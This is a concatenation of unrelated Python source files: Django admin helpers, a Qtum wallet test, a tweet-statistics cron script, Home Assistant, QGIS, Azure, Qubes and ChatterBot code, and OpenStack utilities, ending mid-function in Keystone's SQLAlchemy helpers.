AdminField(object): def __init__(self, form, field, is_first): self.field = form[field] # A django.forms.BoundField instance self.is_first = is_first # Whether this field is first on the line self.is_checkbox = isinstance(self.field.field.widget, forms.CheckboxInput) def label_tag(self): classes = [] if self.is_checkbox: classes.append(u'vCheckboxLabel') contents = force_unicode(escape(self.field.label)) else: contents = force_unicode(escape(self.field.label)) + u':' if self.field.field.required: classes.append(u'required') if not self.is_first: classes.append(u'inline') attrs = classes and {'class': u' '.join(classes)} or {} return self.field.label_tag(contents=contents, attrs=attrs) class AdminReadonlyField(object): def __init__(self, form, field, is_first, model_admin=None): label = label_for_field(field, form._meta.model, model_admin) # Make self.field look a little bit like a field. This means that # {{ field.name }} must be a useful class name to identify the field. # For convenience, store other field-related data here too. if callable(field): class_name = field.__name__ != '<lambda>' and field.__name__ or '' else: class_name = field self.field = { 'name': class_name, 'label': label, 'field': field, } self.form = form self.model_admin = model_admin self.is_first = is_first self.is_checkbox = False self.is_readonly = True def label_tag(self): attrs = {} if not self.is_first: attrs["class"] = "inline" label = self.field['label'] contents = capfirst(force_unicode(escape(label))) + u":" return mark_safe('<label%(attrs)s>%(contents)s</label>' % { "attrs": flatatt(attrs), "contents": contents, }) def contents(self): from django.contrib.admin.templatetags.admin_list import _boolean_icon from django.contrib.admin.views.main import EMPTY_CHANGELIST_VALUE field, obj, model_admin = self.field['field'], self.form.instance, self.model_admin try: f, attr, value = lookup_field(field, obj, model_admin) except (AttributeError, ValueError, ObjectDoesNotExist): result_repr = EMPTY_CHANGELIST_VALUE else: if f is None: boolean = getattr(attr, "boolean", False) if boolean: result_repr = _boolean_icon(value) else: result_repr = smart_unicode(value) if getattr(attr, "allow_tags", False): result_repr = mark_safe(result_repr) else: if value is None: result_repr = EMPTY_CHANGELIST_VALUE elif isinstance(f.rel, ManyToManyRel): result_repr = ", ".join(map(unicode, value.all())) else: result_repr = display_for_field(value, f) return conditional_escape(result_repr) class InlineAdminFormSet(object): """ A wrapper around an inline formset for use in the admin system. 
""" def __init__(self, inline, formset, fieldsets, readonly_fields=None, model_admin=None): self.opts = inline self.formset = formset self.fieldsets = fieldsets self.model_admin = model_admin if readonly_fields is None: readonly_fields = () self.readonly_fields = readonly_fields def __iter__(self): for form, original in zip(self.formset.initial_forms, self.formset.get_queryset()): yield InlineAdminForm(self.formset, form, self.fieldsets, self.opts.prepopulated_fields, original, self.readonly_fields, model_admin=self.model_admin) for form in self.formset.extra_forms: yield InlineAdminForm(self.formset, form, self.fieldsets, self.opts.prepopulated_fields, None, self.readonly_fields, model_admin=self.model_admin) yield InlineAdminForm(self.formset, self.formset.empty_form, self.fieldsets, self.opts.prepopulated_fields, None, self.readonly_fields, model_admin=self.model_admin) def fields(self): fk = getattr(self.formset, "fk", None) for i, field in enumerate(flatten_fieldsets(self.fieldsets)): if fk and fk.name == field: continue if field in self.readonly_fields: yield { 'label': label_for_field(field, self.opts.model, self.model_admin), 'widget': { 'is_hidden': False }, 'required': False } else: yield self.formset.form.base_fields[field] def _media(self): media = self.opts.media + self.formset.media for fs in self: media = media + fs.media return media media = property(_media) class InlineAdminForm(AdminForm): """ A wrapper around an inline form for use in the admin system. """ def __init__(self, formset, form, fieldsets, prepopulated_fields, original, readonly_fields=None, model_admin=None): self.formset = formset self.model_admin = model_admin self.original = original if original is not None: self.original_content_type_id = ContentType.objects.get_for_model(original).pk self.show_url = original and hasattr(original, 'get_absolute_url') super(InlineAdminForm, self).__init__(form, fieldsets, prepopulated_fields, readonly_fields, model_admin) def __iter__(self): for name, options in self.fieldsets: yield InlineFieldset(self.formset, self.form, name, self.readonly_fields, model_admin=self.model_admin, **options) def has_auto_field(self): if self.form._meta.model._meta.has_auto_field: return True # Also search any parents for an auto field. for parent in self.form._meta.model._meta.get_parent_list(): if parent._meta.has_auto_field: return True return False def field_count(self): # tabular.html uses this function for colspan value. 
num_of_fields = 0 if self.has_auto_field(): num_of_fields += 1 num_of_fields += len(self.fieldsets[0][1]["fields"]) if self.formset.can_order: num_of_fields += 1 if self.formset.can_delete: num_of_fields += 1 return num_of_fields def pk_field(self): return AdminField(self.form, self.formset._pk_field.name, False) def fk_field(self): fk = getattr(self.formset, "fk", None) if fk: return AdminField(self.form, fk.name, False) else: return "" def deletion_field(self): from django.forms.formsets import DELETION_FIELD_NAME return AdminField(self.form, DELETION_FIELD_NAME, False) def ordering_field(self): from django.forms.formsets import ORDERING_FIELD_NAME return AdminField(self.form, ORDERING_FIELD_NAME, False) class InlineFieldset(Fieldset): def __init__(self, formset, *args, **kwargs): self.formset = formset super(InlineFieldset, self).__init__(*args, **kwargs) def __iter__(self): fk = getattr(self.formset, "fk", None) for field in self.fields: if fk and fk.name == field: continue yield Fieldline(self.form, field, self.readonly_fields, model_admin=self.model_admin) class AdminErrorList(forms.util.ErrorList): """ Stores all errors for the form/formsets in an add/change stage view. """ def __init__(self, form, inline_formsets): if form.is_bound: self.extend(form.errors.values()) for inline_formset in inline_formsets: self.extend(inline_formset.non_form_errors()) for errors_in_inline_form in inline_formset.errors: self.extend(errors_in_inline_form.values()) def normalize_fieldsets(fieldsets): """ Make sure the keys in fieldset dictionaries are strings. Returns the normalized data. """ result = [] for name, options in fieldsets: result.append((name, normalize_dictionary(options))) return result def normalize_dictionary(data_dict): """ Converts all the keys in "data_dict" to strings. The keys must be convertible using str(). """ for key, value in data_dict.items(): if not isinstance(key, str): del data_dict[key] data_dict[str(key)] = value return data_dict
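# A small, self-contained illustration (hypothetical fieldsets, Python 2 era
# like the rest of this module) of what normalize_fieldsets() and
# normalize_dictionary() achieve: unicode option keys are re-inserted as
# plain str keys so the options dict can be expanded as **kwargs into
# Fieldset().
def _normalize_example():
    example = [
        (None, {u'fields': ('name', 'email')}),
        ('Advanced', {u'classes': ('collapse',), u'fields': ('bio',)}),
    ]
    normalized = normalize_fieldsets(example)
    assert all(isinstance(key, str)
               for _name, options in normalized
               for key in options)
    return normalized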
#!/usr/bin/env python3 # Copyright (c) 2018-2019 The Bitcoin Core developers # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. """Test wallet group functionality.""" from test_framework.test_framework import BitcoinTestFramework from test_framework.messages import CTransaction, FromHex, ToHex from test_framework.util import ( assert_approx, assert_equal, ) from test_framework.qtumconfig import COINBASE_MATURITY, MAX_BLOCK_SIGOPS from test_framework.qtum import generatesynchronized class WalletGroupTest(BitcoinTestFramework): def set_test_params(self): self.setup_clean_chain = True self.num_nodes = 3 self.extra_args = [[], [], ['-avoidpartialspends']] self.rpc_timewait = 120 def skip_test_if_missing_module(self): self.skip_if_no_wallet() def run_test(self): # Mine some coins generatesynchronized(self.nodes[0], 10+COINBASE_MATURITY, None, self.nodes) # Get some addresses from the two nodes addr1 = [self.nodes[1].getnewaddress() for i in range(3)] addr2 = [self.nodes[2].getnewaddress() for i in range(3)] addrs = addr1 + addr2 # Send 1 + 0.5 coin to each address [self.nodes[0].sendtoaddress(addr, 1.0) for addr in addrs] [self.nodes[0].sendtoaddress(addr, 0.5) for addr in addrs] self.nodes[0].generate(1) self.sync_all() # For each node, send 0.2 coins back to 0; # - node[1] should pick one 0.5 UTXO and leave the rest # - node[2] should pick one (1.0 + 0.5) UTXO group corresponding to a # given address, and leave the rest txid1 = self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), 0.2) tx1 = self.nodes[1].getrawtransaction(txid1, True) # txid1 should have 1 input and 2 outputs assert_equal(1, len(tx1["vin"])) assert_equal(2, len(tx1["vout"])) # one output should be 0.2, the other should be ~0.3 v = [vout["value"] for vout in tx1["vout"]] v.sort() assert_approx(v[0], 0.2) assert_approx(v[1], 0.3, 0.01) txid2 = self.nodes[2].sendtoaddress(self.nodes[0].getnewaddress(), 0.2) tx2 = self.nodes[2].getrawtransaction(txid2, True) # txid2 should have 2 inputs and 2 outputs assert_equal(2, len(tx2["vin"])) assert_equal(2, len(tx2["vout"])) # one output should be 0.2, the other should be ~1.3 v = [vout["value"] for vout in tx2["vout"]] v.sort() assert_approx(v[0], 0.2) assert_approx(v[1], 1.3, 0.01) # Empty out node2's wallet self.nodes[2].sendtoaddress(address=self.nodes[0].getnewaddress(), amount=self.nodes[2].getbalance(), subtractfeefromamount=True) self.sync_all() self.nodes[0].generate(1) # Fill node2's wallet with 10000 outputs corresponding to the same # scriptPubKey for i in range(10): raw_tx = self.nodes[0].createrawtransaction([{"txid":"0"*64, "vout":0}], [{addr2[0]: 10/(MAX_BLOCK_SIGOPS//10)}]) tx = FromHex(CTransaction(), raw_tx) tx.vin = [] tx.vout = [tx.vout[0]] * (MAX_BLOCK_SIGOPS//10) funded_tx = self.nodes[0].fundrawtransaction(ToHex(tx)) signed_tx = self.nodes[0].signrawtransactionwithwallet(funded_tx['hex']) self.nodes[0].sendrawtransaction(signed_tx['hex']) self.nodes[0].generate(1) self.sync_all() # Check that we can create a transaction that only requires ~100 of our # utxos, without pulling in all outputs and creating a transaction that # is way too big. assert self.nodes[2].sendtoaddress(address=addr2[0], amount=5) if __name__ == '__main__': WalletGroupTest().main()
#!/usr/bin/env python # add as a cron job: # # crontab -e # add the following line: # 30 3 * * * /[...]/periodic-stats-update.py import psycopg2, psycopg2.extras, sys from datetime import datetime DB_NAME = 'twitterdb' DB_USER = 'twitter' class StatsUpdater(object): def log(self, s, prefix="StatsUpdater: "): if prefix: s = prefix + s sys.stdout.write(s) sys.stdout.flush() def run(self): self.conn = psycopg2.connect(dbname=DB_NAME, user=DB_USER) self.cursor = self.conn.cursor(cursor_factory=psycopg2.extras.DictCursor) try: self.log("Connected to database.\n") last_stats = self.get_last_stats_record() now = datetime.now() self.log("Computing num tweets emitted... ") num_tweets_emitted = self.get_num_tweets_emitted() self.log("done\n", prefix=None) self.log("Computing num tweets captured... ") num_tweets_captured = self.get_num_tweets_captured(last_stats, now) self.log("done\n", prefix=None) self.update_stats(last_stats['period_id'], now, num_tweets_emitted, num_tweets_captured) self.log("Stats saved in database.\n") finally: self.cursor.close() self.conn.close() def get_1st_record(self, query, query_params=()): self.cursor.execute(query, query_params) return self.cursor.fetchall()[0] def get_last_stats_record(self): query = """ select * from stats_per_period where period_id = ( select max(period_id) from stats_per_period);""" return self.get_1st_record(query) def get_num_tweets_emitted(self): """return the number of tweets emitted since the last check period""" # sum the numbers we reported in previous periods query = """ select sum(num_tweets_emitted) from stats_per_period;""" old_count = self.get_1st_record(query)[0] # get the number of statuses emitted by users from the time # we started to collect, using the 'statuses_count' information query = """ select sum(l.statuses_count - f.statuses_count +1) from twitter_user u, user_stats f, user_stats l where u.stats_first_seen = f.user_stats_id and u.stats_now = l.user_stats_id;""" new_count = self.get_1st_record(query)[0] return new_count - old_count def get_num_tweets_captured(self, last_stats, now): """return the number of tweets captured since the last check period""" query = """ select count(*) from tweet where created_at >= %s and created_at < %s""" params = (last_stats['end_of_period'], now) return self.get_1st_record(query, params)[0] def update_stats(self, last_period_id, now, num_tweets_emitted, num_tweets_captured): query = """ insert into stats_per_period( last_period_id, end_of_period, num_tweets_emitted, num_tweets_captured) values (%s,%s,%s,%s);""" self.cursor.execute(query, (last_period_id, now, num_tweets_emitted, num_tweets_captured)) self.conn.commit() return if __name__ == '__main__': updater = StatsUpdater() updater.run()
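# The queries above assume a stats_per_period table roughly like the sketch
# below. The column list is taken from this script's INSERT and SELECT
# statements; the exact types (serial primary key, bigint counters,
# timestamp) are guesses and may differ from the real twitterdb schema.
STATS_PER_PERIOD_DDL = """
create table stats_per_period (
    period_id            serial primary key,
    last_period_id       integer,
    end_of_period        timestamp not null,
    num_tweets_emitted   bigint,
    num_tweets_captured  bigint
);"""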
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2017-02-06 08:23
from __future__ import unicode_literals

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('hkm', '0003_productorder_product_name'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='productorder',
            name='crop_image_height',
        ),
        migrations.RemoveField(
            model_name='productorder',
            name='crop_image_width',
        ),
        migrations.AddField(
            model_name='productorder',
            name='original_height',
            field=models.IntegerField(blank=True, null=True, verbose_name='Original image height'),
        ),
        migrations.AddField(
            model_name='productorder',
            name='original_width',
            field=models.IntegerField(blank=True, null=True, verbose_name='Original image width'),
        ),
        migrations.AlterField(
            model_name='productorder',
            name='crop_x',
            field=models.IntegerField(blank=True, null=True, verbose_name='Crop x coordinate from left'),
        ),
        migrations.AlterField(
            model_name='productorder',
            name='crop_y',
            field=models.IntegerField(blank=True, null=True, verbose_name='Crop y coordinate from top'),
        ),
    ]
""" homeassistant.components.thermostat.heatmiser ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Adds support for the PRT Heatmiser themostats using the V3 protocol. See https://github.com/andylockran/heatmiserV3 for more info on the heatmiserV3 module dependency. For more details about this platform, please refer to the documentation at https://home-assistant.io/components/thermostat.heatmiser/ """ import logging from homeassistant.components.thermostat import ThermostatDevice from homeassistant.const import TEMP_CELCIUS CONF_IPADDRESS = 'ipaddress' CONF_PORT = 'port' CONF_TSTATS = 'tstats' REQUIREMENTS = ["heatmiserV3==0.9.1"] _LOGGER = logging.getLogger(__name__) def setup_platform(hass, config, add_devices, discovery_info=None): """ Sets up the heatmiser thermostat. """ from heatmiserV3 import heatmiser, connection ipaddress = str(config[CONF_IPADDRESS]) port = str(config[CONF_PORT]) if ipaddress is None or port is None: _LOGGER.error("Missing required configuration items %s or %s", CONF_IPADDRESS, CONF_PORT) return False serport = connection.connection(ipaddress, port) serport.open() tstats = [] if CONF_TSTATS in config: tstats = config[CONF_TSTATS] if tstats is None: _LOGGER.error("No thermostats configured.") return False for tstat in tstats: add_devices([ HeatmiserV3Thermostat( heatmiser, tstat.get("id"), tstat.get("name"), serport) ]) return class HeatmiserV3Thermostat(ThermostatDevice): """ Represents a HeatmiserV3 thermostat. """ # pylint: disable=too-many-instance-attributes def __init__(self, heatmiser, device, name, serport): self.heatmiser = heatmiser self.device = device self.serport = serport self._current_temperature = None self._name = name self._id = device self.dcb = None self.update() self._target_temperature = int(self.dcb.get("roomset")) @property def name(self): """ Returns the name of the honeywell, if any. """ return self._name @property def unit_of_measurement(self): """ Unit of measurement this thermostat uses.""" return TEMP_CELCIUS @property def current_temperature(self): """ Returns the current temperature. """ if self.dcb is not None: low = self.dcb.get("floortemplow ") high = self.dcb.get("floortemphigh") temp = (high*256 + low)/10.0 self._current_temperature = temp else: self._current_temperature = None return self._current_temperature @property def target_temperature(self): """ Returns the temperature we try to reach. """ return self._target_temperature def set_temperature(self, temperature): """ Set new target temperature """ temperature = int(temperature) self.heatmiser.hmSendAddress( self._id, 18, temperature, 1, self.serport) self._target_temperature = int(temperature) def update(self): self.dcb = self.heatmiser.hmReadAddress( self._id, 'prt', self.serport)
import os
from setuptools import setup, find_packages

here = os.path.abspath(os.path.dirname(__file__))
try:
    readme = open(os.path.join(here, 'README.md')).read()
except IOError:
    readme = ''

install_requires = [
    'era>=1.1',
]

setup_requires = [
    'coverage>=3.7.0',
    'nose>=1.3.0',
]

setup(
    name='bearform',
    version='1.2',
    description="Easy data conversion and validation for frontends.",
    long_description=readme,
    classifiers=[
        "Intended Audience :: Developers",
        "Programming Language :: Python",
        "Programming Language :: Python :: 2",
        "Programming Language :: Python :: 2.7",
        "License :: OSI Approved :: BSD License",
    ],
    keywords='python json frontend validation',
    author='WiFast',
    author_email='[email protected]',
    url='https://github.com/WiFast/bearform',
    license='BSD-derived',
    zip_safe=False,
    packages=find_packages(exclude=['tests']),
    include_package_data=True,
    install_requires=install_requires,
    setup_requires=setup_requires,
    test_suite='nose.collector',
    entry_points='',
)
# -*- coding: utf-8 -*- """ *************************************************************************** OpenModelFromFileAction.py --------------------- Date : February 2018 Copyright : (C) 2018 by Nyall Dawson Email : nyall dot dawson at gmail dot com *************************************************************************** * * * This program is free software; you can redistribute it and/or modify * * it under the terms of the GNU General Public License as published by * * the Free Software Foundation; either version 2 of the License, or * * (at your option) any later version. * * * *************************************************************************** """ __author__ = 'Nyall Dawson' __date__ = 'February 2018' __copyright__ = '(C) 2018, Nyall Dawson' # This will get replaced with a git SHA1 when you do a git archive __revision__ = '$Format:%H$' import os from qgis.PyQt.QtWidgets import QFileDialog from qgis.PyQt.QtCore import QFileInfo, QCoreApplication from qgis.core import QgsApplication, QgsSettings from processing.gui.ToolboxAction import ToolboxAction from processing.modeler.ModelerDialog import ModelerDialog pluginPath = os.path.split(os.path.dirname(__file__))[0] class OpenModelFromFileAction(ToolboxAction): def __init__(self): self.name = QCoreApplication.translate('OpenModelFromFileAction', 'Open Existing Model…') self.group = self.tr('Tools') def getIcon(self): return QgsApplication.getThemeIcon("/processingModel.svg") def execute(self): settings = QgsSettings() lastDir = settings.value('Processing/lastModelsDir', '') filename, selected_filter = QFileDialog.getOpenFileName(self.toolbox, self.tr('Open Model', 'AddModelFromFileAction'), lastDir, self.tr('Processing model files (*.model3 *.MODEL3)', 'AddModelFromFileAction')) if filename: settings.setValue('Processing/lastModelsDir', QFileInfo(filename).absoluteDir().absolutePath()) dlg = ModelerDialog() dlg.loadModel(filename) dlg.show()
#!/usr/bin/python from azuremodules import * import argparse import os parser = argparse.ArgumentParser() parser.add_argument('-wl', '--whitelist', help='specify the xml file which contains the ignorable errors') args = parser.parse_args() white_list_xml = args.whitelist def RunTest(): UpdateState("TestRunning") RunLog.info("Checking for ERROR messages in waagent.log...") errors = Run("grep ERROR /var/log/waagent.log") if (not errors) : RunLog.info('There is no errors in the logs waagent.log') ResultLog.info('PASS') UpdateState("TestCompleted") else : if white_list_xml and os.path.isfile(white_list_xml): try: import xml.etree.cElementTree as ET except ImportError: import xml.etree.ElementTree as ET white_list_file = ET.parse(white_list_xml) xml_root = white_list_file.getroot() RunLog.info('Checking ignorable walalog ERROR messages...') for node in xml_root: if (errors and node.tag == "errors"): for keywords in node: if(errors): errors = RemoveIgnorableMessages(''.join(errors), keywords.text) if (errors): RunLog.info('ERROR are present in wala log.') RunLog.info('Errors: ' + ''.join(errors)) ResultLog.error('FAIL') else: ResultLog.info('PASS') UpdateState("TestCompleted") def RemoveIgnorableMessages(messages, keywords): matchstring = re.findall(keywords,messages,re.M) matchcount = 0 index = 0 if(matchstring): for msg in matchstring: RunLog.info('Ignorable ERROR message:\n' + msg) matchcount += 1 while matchcount > 0: matchcount -= 1 messages = messages.replace(matchstring[index],'') index += 1 valid_list = [] if re.search('error', messages, re.IGNORECASE): valid_list.append(messages) if len(valid_list) > 0: return valid_list else: return None else: return messages RunTest()
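# The parsing loop above implies a whitelist XML shaped roughly like the
# sample below: only an <errors> node and the text of its children (used as
# regular expressions) are read; the root tag and child tag names are
# otherwise free. The sample patterns are illustrative, not real waagent
# errors.
SAMPLE_WHITELIST = """<whitelist>
    <errors>
        <keyword>ERROR.*Transport endpoint is not connected</keyword>
        <keyword>ERROR.*cgroup</keyword>
    </errors>
</whitelist>"""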
import os
from subprocess import Popen

from gi.repository import Nautilus, GObject


class OpenInDvmItemExtension(GObject.GObject, Nautilus.MenuProvider):
    '''Open File(s) in DisposableVM.

    Uses the nautilus-python api to provide a context menu within Nautilus
    which will enable the user to select file(s) to open in a disposableVM.
    '''

    def get_file_items(self, window, files):
        '''Attaches context menu in Nautilus.'''
        if not files:
            return

        menu_item = Nautilus.MenuItem(name='QubesMenuProvider::OpenInDvm',
                                      label='Open In DisposableVM',
                                      tip='',
                                      icon='')

        menu_item.connect('activate', self.on_menu_item_clicked, files)
        return menu_item,

    def on_menu_item_clicked(self, menu, files):
        '''Called when user chooses files through Nautilus context menu.'''
        for file_obj in files:
            # Check if file still exists
            if file_obj.is_gone():
                return

            gio_file = file_obj.get_location()

            # Use subprocess.DEVNULL in python >= 3.3
            devnull = open(os.devnull, 'wb')

            # Use Popen instead of subprocess.call to spawn the process
            Popen(['nohup', '/usr/bin/qvm-open-in-dvm', gio_file.get_path()],
                  stdout=devnull, stderr=devnull)
from chatterbot import ChatBot import tkinter as tk try: import ttk as ttk import ScrolledText except ImportError: import tkinter.ttk as ttk import tkinter.scrolledtext as ScrolledText import time class TkinterGUIExample(tk.Tk): def __init__(self, *args, **kwargs): """ Create & set window variables. """ tk.Tk.__init__(self, *args, **kwargs) self.chatbot = ChatBot( "GUI Bot", storage_adapter="chatterbot.storage.SQLStorageAdapter", logic_adapters=[ "chatterbot.logic.BestMatch" ], database_uri="sqlite:///database.sqlite3" ) self.title("Chatterbot") self.initialize() def initialize(self): """ Set window layout. """ self.grid() self.respond = ttk.Button(self, text='Get Response', command=self.get_response) self.respond.grid(column=0, row=0, sticky='nesw', padx=3, pady=3) self.usr_input = ttk.Entry(self, state='normal') self.usr_input.grid(column=1, row=0, sticky='nesw', padx=3, pady=3) self.conversation_lbl = ttk.Label(self, anchor=tk.E, text='Conversation:') self.conversation_lbl.grid(column=0, row=1, sticky='nesw', padx=3, pady=3) self.conversation = ScrolledText.ScrolledText(self, state='disabled') self.conversation.grid(column=0, row=2, columnspan=2, sticky='nesw', padx=3, pady=3) def get_response(self): """ Get a response from the chatbot and display it. """ user_input = self.usr_input.get() self.usr_input.delete(0, tk.END) response = self.chatbot.get_response(user_input) self.conversation['state'] = 'normal' self.conversation.insert( tk.END, "Human: " + user_input + "\n" + "ChatBot: " + str(response.text) + "\n" ) self.conversation['state'] = 'disabled' time.sleep(0.5) gui_example = TkinterGUIExample() gui_example.mainloop()
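# A minimal window-less sketch of the same bot, defined after the GUI example
# purely for illustration: it reuses only ChatBot() and get_response(), with
# the same constructor arguments (and database file) as the class above.
def console_demo():
    bot = ChatBot(
        "Console Bot",
        storage_adapter="chatterbot.storage.SQLStorageAdapter",
        logic_adapters=["chatterbot.logic.BestMatch"],
        database_uri="sqlite:///database.sqlite3"
    )
    while True:
        text = input("Human: ")
        if not text:
            break
        print("ChatBot:", bot.get_response(text))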
# Copyright 2011 OpenStack Foundation. # All Rights Reserved. # Copyright 2013 eNovance # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import contextlib import eventlet import threading import mock import testscenarios from oslo.messaging._executors import impl_blocking from oslo.messaging._executors import impl_eventlet from tests import utils as test_utils load_tests = testscenarios.load_tests_apply_scenarios class TestExecutor(test_utils.BaseTestCase): _impl = [('blocking', dict(executor=impl_blocking.BlockingExecutor, stop_before_return=True)), ('eventlet', dict(executor=impl_eventlet.EventletExecutor, stop_before_return=False))] @classmethod def generate_scenarios(cls): cls.scenarios = testscenarios.multiply_scenarios(cls._impl) @staticmethod def _run_in_thread(executor): def thread(): executor.start() executor.wait() thread = threading.Thread(target=thread) thread.daemon = True thread.start() thread.join(timeout=30) def test_executor_dispatch(self): callback = mock.MagicMock(return_value='result') class Dispatcher(object): @contextlib.contextmanager def __call__(self, incoming): yield lambda: callback(incoming.ctxt, incoming.message) listener = mock.Mock(spec=['poll']) executor = self.executor(self.conf, listener, Dispatcher()) incoming_message = mock.MagicMock(ctxt={}, message={'payload': 'data'}) def fake_poll(): if self.stop_before_return: executor.stop() return incoming_message else: if listener.poll.call_count == 1: return incoming_message executor.stop() listener.poll.side_effect = fake_poll self._run_in_thread(executor) callback.assert_called_once_with({}, {'payload': 'data'}) TestExecutor.generate_scenarios() class ExceptedException(Exception): pass class EventletContextManagerSpawnTest(test_utils.BaseTestCase): def setUp(self): super(EventletContextManagerSpawnTest, self).setUp() self.before = mock.Mock() self.callback = mock.Mock() self.after = mock.Mock() self.exception_call = mock.Mock() @contextlib.contextmanager def context_mgr(): self.before() try: yield lambda: self.callback() except ExceptedException: self.exception_call() self.after() self.mgr = context_mgr() def test_normal_run(self): thread = impl_eventlet.spawn_with(self.mgr, pool=eventlet) thread.wait() self.assertEqual(self.before.call_count, 1) self.assertEqual(self.callback.call_count, 1) self.assertEqual(self.after.call_count, 1) self.assertEqual(self.exception_call.call_count, 0) def test_excepted_exception(self): self.callback.side_effect = ExceptedException thread = impl_eventlet.spawn_with(self.mgr, pool=eventlet) try: thread.wait() except ExceptedException: pass self.assertEqual(self.before.call_count, 1) self.assertEqual(self.callback.call_count, 1) self.assertEqual(self.after.call_count, 1) self.assertEqual(self.exception_call.call_count, 1) def test_unexcepted_exception(self): self.callback.side_effect = Exception thread = impl_eventlet.spawn_with(self.mgr, pool=eventlet) try: thread.wait() except Exception: pass self.assertEqual(self.before.call_count, 1) self.assertEqual(self.callback.call_count, 1) 
self.assertEqual(self.after.call_count, 0) self.assertEqual(self.exception_call.call_count, 0)
# vim: tabstop=4 shiftwidth=4 softtabstop=4 # Copyright 2010 United States Government as represented by the # Administrator of the National Aeronautics and Space Administration. # Copyright 2010-2011 OpenStack Foundation. # Copyright 2012 Justin Santa Barbara # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import re from migrate.changeset import UniqueConstraint import sqlalchemy from sqlalchemy import Boolean from sqlalchemy import CheckConstraint from sqlalchemy import Column from sqlalchemy.engine import reflection from sqlalchemy.ext.compiler import compiles from sqlalchemy import func from sqlalchemy import Index from sqlalchemy import Integer from sqlalchemy import MetaData from sqlalchemy.sql.expression import literal_column from sqlalchemy.sql.expression import UpdateBase from sqlalchemy.sql import select from sqlalchemy import String from sqlalchemy import Table from sqlalchemy.types import NullType from keystone.openstack.common.gettextutils import _ # noqa from keystone.openstack.common import log as logging from keystone.openstack.common import timeutils LOG = logging.getLogger(__name__) _DBURL_REGEX = re.compile(r"[^:]+://([^:]+):([^@]+)@.+") def sanitize_db_url(url): match = _DBURL_REGEX.match(url) if match: return '%s****:****%s' % (url[:match.start(1)], url[match.end(2):]) return url class InvalidSortKey(Exception): message = _("Sort key supplied was not valid.") # copy from glance/db/sqlalchemy/api.py def paginate_query(query, model, limit, sort_keys, marker=None, sort_dir=None, sort_dirs=None): """Returns a query with sorting / pagination criteria added. Pagination works by requiring a unique sort_key, specified by sort_keys. (If sort_keys is not unique, then we risk looping through values.) We use the last row in the previous page as the 'marker' for pagination. So we must return values that follow the passed marker in the order. With a single-valued sort_key, this would be easy: sort_key > X. With a compound-values sort_key, (k1, k2, k3) we must do this to repeat the lexicographical ordering: (k1 > X1) or (k1 == X1 && k2 > X2) or (k1 == X1 && k2 == X2 && k3 > X3) We also have to cope with different sort_directions. Typically, the id of the last row is used as the client-facing pagination marker, then the actual marker object must be fetched from the db and passed in to us as marker. :param query: the query object to which we should add paging/sorting :param model: the ORM model class :param limit: maximum number of items to return :param sort_keys: array of attributes by which results should be sorted :param marker: the last item of the previous page; we returns the next results after this value. :param sort_dir: direction in which results should be sorted (asc, desc) :param sort_dirs: per-column array of sort_dirs, corresponding to sort_keys :rtype: sqlalchemy.orm.query.Query :return: The query with sorting/pagination added. 
""" if 'id' not in sort_keys: # TODO(justinsb): If this ever gives a false-positive, check # the actual primary key, rather than assuming its id LOG.warn(_('Id not in sort_keys; is sort_keys unique?')) assert(not (sort_dir and sort_dirs)) # Default the sort direction to ascending if sort_dirs is None and sort_dir is None: sort_dir = 'asc' # Ensure a per-column sort direction if sort_dirs is None: sort_dirs = [sort_dir for _sort_key in sort_keys] assert(len(sort_dirs) == len(sort_keys)) # Add sorting for current_sort_key, current_sort_dir in zip(sort_keys, sort_dirs): try: sort_dir_func = { 'asc': sqlalchemy.asc, 'desc': sqlalchemy.desc, }[current_sort_dir] except KeyError: raise ValueError(_("Unknown sort direction, " "must be 'desc' or 'asc'")) try: sort_key_attr = getattr(model, current_sort_key) except AttributeError: raise InvalidSortKey() query = query.order_by(sort_dir_func(sort_key_attr)) # Add pagination if marker is not None: marker_values = [] for sort_key in sort_keys: v = getattr(marker, sort_key) marker_values.append(v) # Build up an array of sort criteria as in the docstring criteria_list = [] for i in range(0, len(sort_keys)): crit_attrs = [] for j in range(0, i): model_attr = getattr(model, sort_keys[j]) crit_attrs.append((model_attr == marker_values[j])) model_attr = getattr(model, sort_keys[i]) if sort_dirs[i] == 'desc': crit_attrs.append((model_attr < marker_values[i])) else: crit_attrs.append((model_attr > marker_values[i])) criteria = sqlalchemy.sql.and_(*crit_attrs) criteria_list.append(criteria) f = sqlalchemy.sql.or_(*criteria_list) query = query.filter(f) if limit is not None: query = query.limit(limit) return query def get_table(engine, name): """Returns an sqlalchemy table dynamically from db. Needed because the models don't work for us in migrations as models will be far out of sync with the current data. """ metadata = MetaData() metadata.bind = engine return Table(name, metadata, autoload=True) class InsertFromSelect(UpdateBase): """Form the base for `INSERT INTO table (SELECT ... )` statement.""" def __init__(self, table, select): self.table = table self.select = select @compiles(InsertFromSelect) def visit_insert_from_select(element, compiler, **kw): """Form the `INSERT INTO table (SELECT ... )` statement.""" return "INSERT INTO %s %s" % ( compiler.process(element.table, asfrom=True), compiler.process(element.select)) class ColumnError(Exception): """Error raised when no column or an invalid column is found.""" def _get_not_supported_column(col_name_col_instance, column_name): try: column = col_name_col_instance[column_name] except KeyError: msg = _("Please specify column %s in col_name_col_instance " "param. It is required because column has unsupported " "type by sqlite).") raise ColumnError(msg % column_name) if not isinstance(column, Column): msg = _("col_name_col_instance param has wrong type of " "column instance for column %s It should be instance " "of sqlalchemy.Column.") raise ColumnError(msg % column_name) return column def drop_unique_constraint(migrate_engine, table_name, uc_name, *columns, 